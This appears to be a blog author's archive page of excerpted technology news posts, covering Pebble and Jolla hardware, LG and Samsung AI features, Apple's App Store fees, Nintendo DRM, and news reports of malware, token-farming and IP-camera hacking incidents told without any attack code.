Author Archives: Robin Edgar

About Robin Edgar

Organisational Structures | Technology and Science | Military, IT and Lifestyle consultancy | Social, Broadcast & Cross Media | Flying aircraft

The Pebble Round 2 is here, and it fixes the original’s biggest flaws

Posted on by

2025 was a surprisingly big year for Pebble fans. Last March, former Pebble CEO Eric Migicovsky unexpectedly launched two new Pebble smartwatches: the Pebble 2 Duo and the Pebble Time 2. Now, on just the second day of 2026, Migicovsky has announced a third Pebble smartwatch — the Pebble Round 2.

For all intents and purposes, the Pebble Round 2 is a spiritual successor to the Pebble Time Round, Pebble’s excellent circular smartwatch that was released in 2015. At first glance, the new watch looks indistinguishable from its older sibling. However, there are a couple of key upgrades that fix the original Pebble Time Round’s biggest flaws.

The first is the display. Where the Pebble Time Round featured a 1-inch screen, the Pebble Round 2 has a 1.3-inch screen. A 0.3-inch size upgrade may not sound like much on paper, but as you can see from the photos above, it’s a night-and-day difference when looking at the Pebble Round 2 and Pebble Time Round side by side — largely thanks to the drastically reduced bezels on the new watch.

In addition to the larger size, the Pebble Round 2’s screen is also higher quality, featuring a 260 x 260 resolution that’s twice as sharp as the OG Pebble Time Round. The screen is also now optically bonded, resulting in greatly improved viewing angles compared to the previous model.

The other big upgrade is battery life. Migicovsky says the Pebble Round 2 should last 10 to 14 days per charge, a massive increase over the two days of battery life provided by the original Pebble Time Round (primarily due to newer, more efficient Bluetooth technology). Although it’s not as impressive as the 30-day battery life offered by the other two Pebble watches announced a few months ago, it’s still incredible endurance considering how light and thin the Pebble Round 2 is.

[…]

It has step and sleep tracking, a compass, two microphones, and 30m water resistance. Compared to the Pebble Time 2, the two most prominent missing features on the Pebble Round 2 are a heart rate monitor and a speaker.

[…]

Source: The Pebble Round 2 is here, and it fixes the original’s biggest flaws

LG forced a Copilot web app onto its TVs but will now let you delete it

Posted on by

LG says it will let users delete the Microsoft Copilot shortcut it installed on newer TVs after several reports highlighted the unremovable icon. In a statement to The Verge, LG spokesperson Chris De Maria says the company “respects consumer choice and will take steps to allow users to delete the shortcut icon if they wish.”

Last week, a user on the r/mildlyinfuriating subreddit posted an image of the Microsoft Copilot icon in their lineup of apps on an LG TV, with no option to delete it. “My LG TV’s new software update installed Microsoft Copilot, which cannot be deleted,” the post says. The post garnered more than 36,000 upvotes as people grow more frustrated with AI popping up just about everywhere.

Both LG and Samsung announced plans to add Microsoft’s Copilot AI assistant to their TVs in January, but it appears to be popping up on LG TVs following a recent update to webOS.

De Maria adds that the icon is a “shortcut” to the Microsoft Copilot web app that opens in the TV’s web browser, rather than “an application-based service embedded in the TV.” He also adds that “features such as microphone input are activated only with the customer’s explicit consent.”

Asked when LG will start letting users delete the Copilot icon, De Maria said there’s no “definitive timing” yet.

Here’s LG’s full statement:

Following recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we’re reaching out to provide an important clarification. Based on recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we want to clarify that Microsoft Copilot is provided as a shortcut icon to enhance customer accessibility and convenience. It is not an application-based service embedded in the TV. When users select the Copilot shortcut, Microsoft’s website opens through the TV’s web browser, and features such as microphone input are activated only with the customer’s explicit consent.

Source: LG forced a Copilot web app onto its TVs but will let you delete it | The Verge

Apple becomes a debt collector with its new developer agreement, could randomly deduct money it believes it should get if devs use external payment processor or app store

Posted on by

Apple on Wednesday released an updated developer license agreement that gives the company permission to recoup unpaid funds, such as commissions or any other fees, by deducting them from in-app purchases it processes on developers’ behalf, among other methods.

The change will impact developers in regions where local law allows them to link to external payment systems. In these cases, developers must report those payments back to Apple to pay the required commissions or fees.

The changed agreement seemingly gives Apple a way to collect what it believes is the correct fee if the company determines a developer has underreported their earnings.

Apple’s policies in this area are complex, but the change could impact developers in markets like the EU, U.S., and, now, Japan, where developers using external payment systems may be required to pay Apple varying fees or commissions depending on local law. (In the U.S., the legality of these commissions is still being disputed. A federal appeals court earlier this month ruled that a district court should consider allowing Apple to collect some commission, though not the full 27% fee it previously charged.)

In its new developer agreement, Apple states it will “offset or recoup” what it believes it is owed, including “any amounts collected by Apple on your behalf from end-users.” This means Apple could recoup funds from developers’ in-app purchases — like those for digital goods, services, and subscriptions — or from one-time fees for paid applications.

Additionally, Apple notes that it has the right to collect this money “at any time” and “from time to time,” meaning developers could face surprise deductions if Apple believes they’ve miscalculated what they owe.

The agreement doesn’t specify how Apple will determine whether it’s owed money.

The types of developer payments that vary over time are limited and include commissions, fees, and taxes. Among these is the Core Technology Fee (CTF) in the EU, which currently costs €0.50 for each first annual install exceeding one million in the past 12 months. In January 2026, Apple will transition from the CTF to a new fee, called the Core Technology Commission (CTC), a more complicated percentage-based fee. Apple will collect the CTC from apps that use external payment methods or are distributed under its alternative business terms for the EU.

The updated developer agreement also gives Apple the right to collect unpaid amounts from any “affiliates, parents, or subsidiaries” related to the account that owes money. In practical terms, that means Apple could collect the money from developers’ other apps, or from apps published by a parent company.

[…]

Source: Apple becomes a debt collector with its new developer agreement | TechCrunch

So after being forced by the EU (and others) to allow external payment providers and app stores, Apple then went into a tissy fit and started stamping it’s feet against these rulings, trying everything to keep extorting anyone selling anything on an IOS device. Now it’s just going to take what it believes is theres – and you had better believe there will be no recourse.

Apple thinks it can argue its’ way out of EU DMA with a single comma. No it can’t and this fight will cost it billions in Europe

EU to force Apple to open up IOS for developers

Apple tries again to make EU officials happy with new fees for in-app purchases

Apple stamps feet but now to let EU developers distribute apps from the web

Apple reverses hissy fit decision to remove Home Screen web apps in EU

EU forces Apple to open up to third-party app stores and payments. Details emerge what it will look like.

I can have app store? Apple: yes but NO! Give €1,000,000 + lock in to Apple ecosystem. This is how to “comply” with EU anti competition law

 

Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars

Posted on by

[…] if it were in our solar system, it could travel from Earth to the Moon in 14 minutes. This supermassive black hole, weighing as much as 20 million Suns, has left behind a never-before-seen 200,000-light-year-long “contrail” of newborn stars, twice the diameter of our Milky Way galaxy. It’s likely the result of a rare, bizarre game of galactic billiards among three massive black holes.

Rather than gobbling up stars ahead of it, like a cosmic Pac-Man, the speedy black hole is plowing into gas in front of it to trigger new star formation along a narrow corridor.

[…] Nothing like it has ever been seen before, but it was captured accidentally by NASA’s Hubble Space Telescope.

This illustration shows a black field speckled with white, yellow and red galaxies. A black hole, near the left, bottom corner of the image, plows through space, leaving a diagonal trail of newborn stars stretching back to the black hole's parent galaxy.

This is an artist’s impression of a runaway supermassive black hole that was ejected from its host galaxy as a result of a tussle between it and two other black holes. As the black hole plows through intergalactic space it compresses tenuous gas in front of it. This precipitates the birth of hot blue stars. This illustration is based on Hubble Space Telescope observations of a 200,000-light-year-long “contrail” of stars behind an escaping black hole.
NASA, ESA, Leah Hustak (STScI)

“We think we’re seeing a wake behind the black hole where the gas cools and is able to form stars. So, we’re looking at star formation trailing the black hole,” said Pieter van Dokkum of Yale University in New Haven, Connecticut. “What we’re seeing is the aftermath. Like the wake behind a ship we’re seeing the wake behind the black hole.” The trail must have lots of new stars, given that it is almost half as bright as the host galaxy it is linked to.

The black hole lies at one end of the column, which stretches back to its parent galaxy. There is a remarkably bright knot of ionized oxygen at the outermost tip of the column. Researchers believe gas is probably being shocked and heated from the motion of the black hole hitting the gas, or it could be radiation from an accretion disk around the black hole. “Gas in front of it gets shocked because of this supersonic, very high-velocity impact of the black hole moving through the gas. How it works exactly is not really known,” said van Dokkum.

“This is pure serendipity that we stumbled across it,” van Dokkum added. He was looking for globular star clusters in a nearby dwarf galaxy. “I was just scanning through the Hubble image and then I noticed that we have a little streak. I immediately thought, ‘oh, a cosmic ray hitting the camera detector and causing a linear imaging artifact.’ When we eliminated cosmic rays we realized it was still there. It didn’t look like anything we’ve seen before.”

A Hubble image of a black, deep-space field is speckled with galaxies and one, lone star. In the center of the image is a small, white-bordered, boxed area that contains one, long, thin, diagonal streak of whitish-blue stars and two galaxies. To the right of the small box is a larger, white-bordered box that contains a magnified view of the contents of smaller box.

This Hubble Space Telescope archival photo captures a curious linear feature that is so unusual it was first dismissed as an imaging artifact from Hubble’s cameras. But follow-up spectroscopic observations reveal it is a 200,000-light-year-long chain of young blue stars. A supermassive black hole lies at the tip of the bridge at lower left. The black hole was ejected from the galaxy at upper right. It compressed gas in its wake to leave a long trail of young blue stars. Nothing like this has ever been seen before in the universe. This unusual event happened when the universe was approximately half its current age.
NASA, ESA, Pieter van Dokkum (Yale); Image Processing: Joseph DePasquale (STScI)

Because it was so weird, van Dokkum and his team did follow-up spectroscopy with the W. M. Keck Observatories in Hawaii. He describes the star trail as “quite astonishing, very, very bright and very unusual.” This led to the conclusion that he was looking at the aftermath of a black hole flying through a halo of gas surrounding the host galaxy.

[…]

Source: Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars – NASA Science

New Nintendo DRM allows them to remotely brick the device you bought permanently – you don’t own what you bought part XXX

Posted on by

In the lead up to its Switch 2 console release, Nintendo updated its user agreement and asserted broad authority to make consoles owned by its customers permanently unusable. Under Nintendo’s most aggressive digital restrictions management (DRM) update to date, game console owners are now required to give Nintendo the unilateral right to revoke access to games, security updates, and the Internet, at its sole discretion. The new agreement states:

“You acknowledge that if you fail to comply with [Nintendo’s restrictions], Nintendo may render the Nintendo Account Services and/or the applicable Nintendo device permanently unusable in whole or in part.”

These new, wide-sweeping restrictions affect a large number of users for many different reasons. There are probably other reasons that Nintendo has and will justify bricking game consoles, but here are some that we have seen reported:

  • “Tampering” with hardware or software in pretty much any way;
  • Attempting to play a back-up game;
  • Playing a “used” game; or
  • Use of a third-party game or accessory.

When Nintendo remotely bricks a perfectly-functional device, the game console becomes effectively useless. Users are blocked from ever accessing the Internet again with the system, which in turn restricts services like eShop (the digital distribution service for the Nintendo Switch), online play, using the subscription-based Nintendo Switch Online (which includes access to retro game catalogs and the ability to back up game data), game download (including previously-purchased codes and “game-key” cartridges ), and security patches. As if blocking Internet access alone wasn’t enough, a bricked device is no longer able to play downloaded games, either. These restrictions don’t just apply to the user who broke the Nintendo’s extremely strict user agreements: the block is for the life of the device, no matter who owns it.

A red brick on a wooden floor

No proprietor should have the power to brick your device at its discretion.

Nintendo’s promise to block a user from using their game console isn’t just an empty threat: it has already been wielded against many users.

[…]

Source: New Nintendo DRM bans consoles, makes users beg for forgiveness — Free Software Foundation — Working together for free software

Samsung is putting Google Gemini AI into your refrigerator and wine cellar, whether you need it or not

Posted on by

Samsung is heading into CES 2026 with a familiar message wrapped in a slightly stranger package. You see, the company plans to unveil an updated lineup of kitchen appliances, led by new versions of its Bespoke AI refrigerator, wine cellar, slide in range, and over the range microwaves. What makes this year different is not the stainless finish or the tighter installation tolerances. It is the decision to push Google Gemini directly into the kitchen, starting with a refrigerator that can see what you eat and tell the cloud about it. Yes, really.

At the center of the announcement is the latest Bespoke AI Refrigerator Family Hub from Samsung Electronics. Samsung says this model upgrades its existing AI Vision system with functionality built using Google Gemini, marking the first time Gemini is being integrated into a refrigerator. Previously, the system could recognize a limited number of fresh and pre registered foods locally. The new version is designed to identify more items automatically, including processed foods that no longer require manual setup and leftovers stored in personal containers.

On paper, that sounds convenient. A fridge that knows what is inside it, keeps an updated inventory, and helps manage groceries without constant user input is an idea appliance makers have chased for years. Samsung says more accurate ingredient recognition should make food tracking clearer and easier, while unlocking new use cases around meal planning and personalization. Whether that translates into daily value or becomes another ignored dashboard remains an open question.

Samsung is also extending the same vision based approach to its new Bespoke AI Wine Cellar. A camera mounted inside the unit scans bottle labels as wine is added or removed, tracking inventory through the SmartThings AI Wine Manager. The system knows which shelf each bottle sits on and can surface pairing suggestions based on what is currently stored. For collectors with larger wine inventories, this could genuinely save time. For everyone else, it may feel like a high tech solution searching for a problem.

The elephant in the room is cloud dependency. These AI features are built in collaboration with Google Cloud, which raises predictable questions about data handling, long term support, and what happens when services change or are discontinued. A refrigerator is expected to last many years. Cloud based AI services do not have the same track record. Samsung has not detailed how much processing happens locally versus in the cloud, nor how users can limit or disable data sharing if they choose.

[…]

Source: Samsung is putting Google Gemini AI into your refrigerator, whether you need it or not

Fake MAS Windows activation domain used to spread PowerShell malware

Posted on by

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.

The malware’s panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don’t make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, “get.activate[.]win,” which closely resembles the legitimate one listed in the official MAS activation instructions, “get.activated.win.”

Given that the difference between the two is a single character (“d”), the attackers bet on users mistyping the domain.

Source: Fake MAS Windows activation domain used to spread PowerShell malware

Samsung Releases new Odyssey gaming monitors, including 27″ glasses free 3D

Posted on by

[…]

Samsung Odyssey 3D G9 – G90XF 27”

The Samsung Odyssey 3D G9 - G90XF 27'' gaming display lets you enjoy 3D without glasses.
The Samsung Odyssey 3D G9 – G90XF 27″ gaming monitor breaks new ground with glasses-free 3D. The technology incorporates eye tracking to create a striking depth effect in games and videos.

The 27″ (68cm) Samsung Odyssey 3D G9 – G90XF 4K UHD monitor features glasses-free 3D technology. Thanks to eye tracking and the View Mapping algorithm, the image adapts to the user’s position to create dynamic depth. It can also automatically convert 2D videos into 3D content thanks to AI processing. The screen uses an IPS panel with a refresh rate of 165Hz, a response time of 1 ms and 99% coverage of the sRGB space.

It is FreeSync Premium and G-Sync Compatible, guaranteeing smooth synchronization with the graphics card. Connectors include two HDMI 2.1 ports, one DisplayPort 1.4 and a USB port. The Reality Hub interface centralizes 3D functions and provides access to compatible games. It’s ideal for those who want to discover 3D without constraints, while retaining solid performance for gaming and multimedia uses.

[…]

Source: Samsung Odyssey: new 2025 gaming monitors – Son-Vidéo.com: blog

Tea – a way to secure FOSS by offering financial incentives – brews massive token farming campaigns (and dissolves them)

Posted on by

No good idea – like rewarding open source software developers and maintainers for their contributions – goes unabused by cybercriminals, and this was the case with the Tea Protocol and two token farming campaigns.

Both incidents gave the project’s founders a real-time view into how far – and fast – attackers will go to chase financial gain, and they helped shape “radical changes” that will roll out in the Tea network’s mainnet launch early next year, co-founder and CEO Tim Lewis told The Register.

The Tea Protocol was founded by Max Howell, who created open source package manager Homebrew, and Lewis, who established DEVxDAO, a non-profit that distributes grants to support decentralized computing projects, to reward open source developers and help secure software supply chains via financial incentives.

“When you think about the different package management ecosystems, they all have different gates in front of them, and none of them have been a financial gate,” Lewis said in an interview.

“There’s a human that sits in the front who has to be this gate, but it takes a toll on the human to go through all the data, and that’s only getting worse,” he said. “There’s the proliferation of the AI-induced pull requests, which are great, but that’s become like a DDoS attack.”

Last year, the duo rolled out the Tea Protocol testnet – essentially a test run for the incentives program that allows open source developers to earn cryptocurrency – specifically Tea tokens – for valuable code and fixes, while users can stake Tea to support specific projects and also earn rewards. A portion of the protocol rewards is shared with project maintainers and users who stake their tokens.

“Again, this was on a test network for fake internet points that could eventually potentially have some value,” Lewis said. “Our incentive for that period only lasted about three weeks.”

We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior

In April 2024, the Tea team shut down the incentive program’s rewards after about 15,000 spammy packages flooded the npm registry to farm Tea points. These contained little or zero useful functionality, and were instrumented with “tea.yaml” metadata that linked back to Tea accounts in an attempt to inflate developers’ reputation and earn payouts.

“We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior,” Lewis said.

Then it got worse. In 2025, the earlier Tea farming campaign grew into the IndonesianFoods and Indonesian Tea campaigns that polluted more than 1 percent of npm with spam packages. And in November, Amazon uncovered more than 150,000 malicious npm packages, all linked to another Tea token farming campaign, that the cloud giant described as “one of the largest package flooding incidents in open source registry history.”

“I view this as a canary in the coal mine,” Lewis said.

In these token farming campaigns, the fraudsters flooded registries with spam, as opposed to cryptocurrency- and other secret-stealing laced code –  and neither of the latter two is hypothetical. North Korea’s Lazarus Group and other sophisticated attackers have previously targeted npm for these illicit purposes.

“When you are a destructive organization like Lazarus Group, there’s incentive to use this same techniques to attack [supply chains],” Lewis said. “So we need to fix the core.”

How to reward secure code and penalize spam

To this end, Tea’s founders are working to fix the protocol’s design to ensure that the incentives program can’t be abused when the mainnet launches in early 2026.

This involves requiring packages and projects to pass ownership and provenance checks, and ensuring contributions aren’t just automated spam. The Tea team is also designing monitoring features that will check for Sybil attacks and flag surges in low-quality package creation and suspicious identities.

If malicious-looking patterns are detected, the developer won’t receive rewards and their registrations will be quarantined, pending further review.

Additional key quality and security improvements will happen via integration with PKGX, which Howell wrote. It’s a package runner that creates a containerized environment for projects and manages developer tools across environments. PKGX verifies maintainers using cryptographic signatures and identity checks, and also evaluates their contributions to various projects for quality, along with security posture and dependencies.

This registry will integrate directly with Tea upon the protocol’s mainnet launch, and will auto-detect and penalize, if needed, spammy packages at the point of registration – not after – while rewarding maintainers for their legit contributions.

Automated SBOMs, bug bounties

In the future, Lewis says that this design will also allow enterprises to automate bug bounties, and SBOMs (software bills of materials) that provide an inventory of all the components found in a piece of software. This will make it easier for large companies to map out their dependencies, and then reward developers for fixing any critical security issues they find.

[…]

“Some CISO, somewhere, every day is looking at his tens of thousands of packages that he approved for use, and now he’s responsible for whether or not these things are secure,” Lewis said. “He can’t have all the people that work within his department spend all of their time trying to get some guy in Nebraska to review a pull request and get the critical bug for his architecture solved en masse. We’re hoping this creates a tool that allows that value distribution without impermanent loss en masse.”

Lewis’ goal, he says, is to see upwards of “millions of dollars a day, retrieved for issue completion.”

Project developers and maintainers write the fixes, and chief security officers can confirm to their boards of directors that their dependencies and critical code is secure. “Plus, the meantime for resolution for these issues comes down – and they are not funding groups like North Korea’s Lazarus,” he added.

In other words: Tea’s goal reaches fruition. Open source project maintainers get paid for their valuable work, code becomes more secure, financially motivated crews can’t game the system, and the world becomes a better place. ®

Source: CEO spills the Tea about massive token farming campaigns • The Register

Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

Posted on by

[…]hackers recently breached approximately 120,000 IP cameras across Korea — often found inside private homes like Kim’s — has left her and many others seething, prompting the government to take action.

As shocking the scale of the intrusions was the alleged motive behind them. Videos captured by the hacked cameras were allegedly sold to an overseas pornography website, exposing some of the most intimate moments of unsuspecting victims to anonymous viewers abroad.

Only 1,193 videos from the hacked cameras have been uncovered so far on overseas websites, raising concerns that many more remain undiscovered.

In response, an interagency task force comprising officials from the Ministry of Science and ICT, the Personal Information Protection Commission and the National Police Agency announced on Dec. 7 that it would pursue a multilayered reform package. The measures aim to shift responsibility beyond individuals and camera manufacturers to include installation companies and telecommunications providers.

Yet as policymakers scramble to overhaul regulations and reinforce technical safeguards, interviews with everyday users of IP cameras reveal a gap between how these devices are used and understood and the level of risk they actually pose.

[…]

any hacked cameras were protected by simple or widely known passwords that were rarely changed. A government survey found that only 59 percent of installation companies consistently carried out mandatory security measures, such as changing default password settings.

[…]

What sets the current case apart — and prompted the government’s unusually forceful response — is the nature of the harm involved.

Police believe one suspect hacked 63,000 IP cameras, producing 545 videos that he sold to an overseas website for 35 million won ($24,000) in cryptocurrency. Another suspect allegedly hacked 70,000 devices, creating 648 videos that he later sold to the same website for 18 million won.

The two individuals, whom police say are not accomplices, sourced most of their footage from IP cameras installed in ordinary homes, gynecology offices, breastfeeding rooms, massage parlors, Pilates studios and waxing salons. They often accessed the same compromised devices repeatedly. The videos accounted for 62 percent of all content on the website, which includes a separate “Korean” category.

Two additional suspects are accused of hacking 15,000 cameras and 136 devices, respectively, to collect footage for private possession.

Unlike leaked phone numbers or delivery addresses, compromised IP camera footage can expose faces, bodies, children and private spaces. Prof. Kim emphasized that hacked cameras can reveal “an individual’s movements, daily life and relationships,” making the potential for privacy violations “extremely high.”

[…]

Source: Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

New Jolla Phone Pre-orders hit target quickly. Shows people are fed up with iOS-Android monopoly

Posted on by

After successful crowdfunding, the latest release of the original handheld Linux distro will power a new handset coming in mid-2026.

The initial crowdfunding drive for the new Jolla Phone seems to have gone well: at the time of writing, the new device has comfortably passed double the number of orders needed to go into production. Finnish vendor Jolla set a goal of 2,000 €99 pre-order deposits by January 4th, but passed the goal in less than two weeks. The first batch of 2,700 units were £499. Batch 2 will ship two to four weeks later, and cost €549, but that’s now sold out too. Currently, well over 5,000 orders have been placed. With 20 days to go, the pre-order page says:

We take a maximum of 10,000 pre-orders until January 31st, 2026. Reserve your spot and lock your special total price of 579€.

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black – Click to enlarge

The down payment will be deducted from the total price. Jolla is now taking orders for 5,200 units in batch 3, which will cost €579 and ship three to six weeks later. After the first few production runs, totalling 10,000 units, the price of the handset will go up to €599 to €699.

The phone specs were set by a survey the company ran, with a first stage in August followed by November update. To our eyes it looks decent if not outstanding: 5G connectivity, a 6.36 inch AMOLED screen, an indicator LED, 12 GB of RAM plus 256 GB of storage expandable via microSDXC. Some of the details are welcome: a user-replaceable 5,500 mAh battery, plus a software-based privacy switch which can disable the microphone, or Bluetooth, or Android apps, or other programmable options. For this vulture, a sad absence is a headphone socket.

An added incentive, if the device sells 10,000 units, is the return of smart back covers called The Other Half, which even included a keyboard.

[…]

Sailfish is distinct from any other mobile OS today. Its origins at Nokia predate the January 2007 launch of the iPhone, by whose prospects The Reg was not enthralled. That, of course, also means it was out long before Android, which as Daring Fireball described in 2010 was originally designed to rival Blackberry. (The Internet Archive still has some of Engadget’s screenshots.) After Android was remodeled to take on Apple, both OSes look a lot like each other: the home screen is a grid of app icons, and both lean heavily on tapping on-screen buttons. (Before that, of course, they relied on physical buttons.)

[…]

Sailfish 5 feels very different, with little visible influence from anything else. You flip between its two home screens by swiping left and right. One holds a list of messages and notifications, and the other is a full-screen app switcher, with tiles for each open app. Dragging up from the bottom reveals the app launcher. Uniquely, it distinguishes between long and short drags down from the top of the screen: a long fast swipe down opens a settings panel, but in native Salfish apps, a short slow drag opens a full-screen-width menu; you scroll up and down until the desired option is highlighted, then select it by lifting your thumb. It shows whether options are turned on or off with a large, bright white dot, or a smaller dimmer dot. A different white dot at top left is also the Back button, where one makes sense.

Like the overloaded white-dot symbol, some aspects of the OS are a little confusing. In addition to the official Jolla Store, there are two different tools for managing third-party native apps: StoreMan manages software from the collection on OpenRepos, and Chum GUI manages RPM packages from Chum. Then there’s the built-in AppSupport compatibility layer, which lets you run Android apps. We installed both F-Droid and the Aurora store, and had no problems installing any typical tools such as Signal, Whatsapp, or YouTube Kids.

There are built-in apps for all the things you’d expect a smartphone to do, and these connect to the usual suspects such as Google’s email, calendar, and contacts. There’s a browser based on Mozilla tech, as well, which works fine – as did Android browsers such as Vivaldi. Like its very distant relative Symbian, though, this is a local-first sort of device which can sync, rather than a pocket cloud client.

Maps are a particular weak point: we tried Google Maps and Nokia spin-off Here, which both literally drew a blank. The OpenStreetMap-based Mapy.com ran and could be searched, but couldn’t detect our location. There aren’t many cloud-storage clients, either. The stock keyboard doesn’t support swipe-style text entry, which we found frustrating.

Overall, Sailfish is arguably the most complete independent mobile OS. It’s totally separate from anything from Google, or Apple, or desktop Linux, and the app catalog is impressive. We did regularly get lost in its slightly idiosyncratic UI, but it was always possible to get out again. If you want a total break from the mainstream mobile duopoly, this is a viable alternative. Although you might need a standalone sat-nav too.

[…]

Source: New Jolla, Sailfish 5, offer break from iOS-Android monopoly • The Register

Devs say Apple still flouting EU’s DMA six months on, but cutting fees in US

Posted on by
Six months after EU regulators found Apple’s App Store rules

The Coalition for App Fairness, a nonprofit organization of app developers and consumer groups, has accused Apple of persistent non-compliance with the DMA, warning that the company’s revised App Store terms continue to impose fees which the legislation prohibits.

In an open letter addressed to European Commission President Ursula von der Leyen and senior commissioners, the coalition argues that Apple has failed to deliver “any meaningful changes or proposals” despite an April 2025 non-compliance decision that found its App Store policies illegal and harmful to both developers and consumers.

At the heart of the complaint is money. The DMA requires so-called gatekeepers to allow developers to offer and conduct transactions outside their app stores without charge. Apple, the coalition claims, is seeking to charge commissions of up to 20 percent on those very transactions.

“This is a blatant disregard for the law with the potential to vanquish years of meaningful work by the Commission,” the letter states, accusing Apple of preserving the economics of its App Store while nominally claiming compliance.

Apple has said it will roll out new App Store terms in January 2026, but developers say the company has provided no clarity on what those changes will involve or whether they will actually comply with the DMA.

“We have seen this playbook before in Europe and beyond,” the signatories warn, adding that they suspect any new terms will continue to impose fees that would violate the law.

The letter argues that this uncertainty is already doing damage. Six months after Apple’s last App Store terms update, developers still do not know which rules will govern their businesses or what their costs will look like in the near term.

Apple’s “lack of transparency in tandem with its rushed timelines,” the coalition says, is freezing investment and innovation, effectively allowing the company to “exploit its gatekeeper position by holding the entire industry hostage.”

The group also points to a growing transatlantic contrast that makes Europe look like the tougher regulator with the weaker results. While Apple continues to fight DMA enforcement in the EU, US courts have moved to curb its ability to extract fees from external transactions. Following litigation brought by Epic Games, developers in the US can now communicate freely with customers about pricing and offer payment options outside Apple’s ecosystem without paying commission.

That raises what the coalition calls a “simple and urgent question.” Why should European developers and consumers get a worse deal than their US counterparts, especially when the EU was first to pass a landmark law aimed at fixing digital markets?

[…]

Source: Devs say Apple still flouting EU’s DMA six months on • The Register

Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE – light 8k VR

Posted on by

Pimax, a manufacturer of virtual reality (VR) hardware, debuted its next generation of PC virtual reality (PCVR) headsets to the public at CES 2026. The company demonstrated the final production model of the ‘Crystal Super Micro-OLED,’ alongside its new ‘Dream Air’ and ‘Dream Air SE’ devices.

Both the Crystal Super Micro-OLED and the Dream Air utilize the same optical stack, featuring 4K Sony micro-OLED panels per eye and Pimax’s proprietary “ConcaveView” lens technology. The company noted that the Dream Air SE is positioned as a more affordable version of the Dream Air, though it also utilizes the ConcaveView lenses.

Through close collaboration with hardware partners, Pimax stated that it aims to demonstrate how high-end PCVR can reach its full potential as part of a complete ecosystem. Attendees at CES were able to experience motion feedback and control systems across racing, flight, and active VR setups.

Auganix Managing Editor Sam Sprigg tries a racing sim demo with Pimax’s new Dream Air headset at CES 2026.

Source: Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE

Spotify was down this morning for thousands of users

Posted on by

My boyfriend texted me those dreaded four words: “Is your Spotify down?” Sure enough his, mine and thousands of other users’ Spotify accounts appear to be down and out at the moment, with Downdetector recording over 10,000 reports from users.

Spotify is apparently working on the problem. The account, Spotify Status, shared an update on X at 9:45 AM on Monday, “We’re aware of some issues right now and are checking them out!” About an hour later, the company shared an update saying that the outage was resolved as of 10:34 AM ET.

Source: Spotify was down this morning for thousands of users: Updates on the widespread outages

After Samsung forces Gemini, LG TV users get unremovable Microsoft Copilot through forced update

Posted on by

LG smart TV owners are reporting that a recent webOS software update has added Microsoft Copilot to their TVs, with no apparent way to remove it. Reports first surfaced over the weekend on Reddit, where a post showing a Copilot tile pinned to an LG TV home screen climbed to more than 35,000 upvotes on r/mildlyinfuriating, accompanied by hundreds of comments from users describing the same behavior.

According to affected users, Copilot appears automatically after installing the latest webOS update on certain LG TV models. The feature shows up on the home screen alongside streaming apps, but unlike Netflix or YouTube, it cannot be uninstalled.

LG has previously confirmed plans to integrate Microsoft Copilot into webOS as part of its broader “AI TV” strategy. At CES 2025, the company described Copilot as an extension of its AI Search experience, designed to answer questions and provide recommendations using Microsoft’s AI services. In practice, the iteration of Copilot currently seen on LG TVs appears to function as a shortcut to a web-based Copilot interface rather than a fully native application like the one described by LG.

The issue, for many, isn’t necessarily what Copilot does, but that it has been forced onto consumers with no option to remove it. LG’s own support documentation notes that certain preinstalled or system apps cannot be deleted, only hidden. Users who encounter Copilot after the update report that this limitation applies, leaving them with no way to fully remove the feature once it has been added. It’s a similar story on rival models, for instance some Samsung TV’s include Gemini.

The overwhelmingly negative reaction from users indicates a growing frustration with AI features being imposed on consumers in every way possible. Smart TVs have naturally become platforms for advertising, data collection, and now AI services, with updates adding new functionality that owners did not explicitly request and, in most cases, do not want. While LG allows users to disable some AI-related options, such as voice recognition and personalization features, those settings do not remove the Copilot app itself.

Ultimately, those wanting to minimize Copilot’s presence on their TVs are limited to keeping it disconnected from the Internet. That’s about the most that can be done at the moment, unless LG backtracks and either allows users to disable or completely uninstall the app in response to backlash, which seems unlikely.

Source: LG TV users baffled by unremovable Microsoft Copilot installation — surprise forced update shows app pinned to the home screen | Tom’s Hardware

Google Translate expands live translation to all earbuds on Android

Posted on by

[…]

The latest version of Google’s live translation is built on Gemini and initially rolled out earlier this year. It supports smooth back-and-forth translations as both on-screen text and audio. Beginning a live translate session in Google Translate used to require Pixel Buds, but that won’t be the case going forward.

Google says a beta test of expanded headphone support is launching today in the US, Mexico, and India. The audio translation attempts to preserve the tone and cadence of the original speaker, but it’s not as capable as the full AI-reproduced voice translations you can do on the latest Pixel phones. Google says this feature should work on any earbuds or headphones, but it’s only for Android right now. The feature will expand to iOS in the coming months. Apple does have a similar live translation feature on the iPhone, but it requires AirPods.

[…]

Google also debuted language-learning features earlier this year, borrowing a page from educational apps like Duolingo. You can tell the app your skill level with a language, as well as whether you need help with travel-oriented conversations or more everyday interactions. The app uses this to create tailored listening and speaking exercises.

[…]

Source: Google Translate expands live translation to all earbuds on Android – Ars Technica

Russian hackers debut ransomware service on Telegram. Hardcode the keys in plaintext in tempdir.

Posted on by

CyberVolk, a pro-Russian hacktivist crew, is back after months of silence with a new ransomware service. There’s some bad news and some good news here.

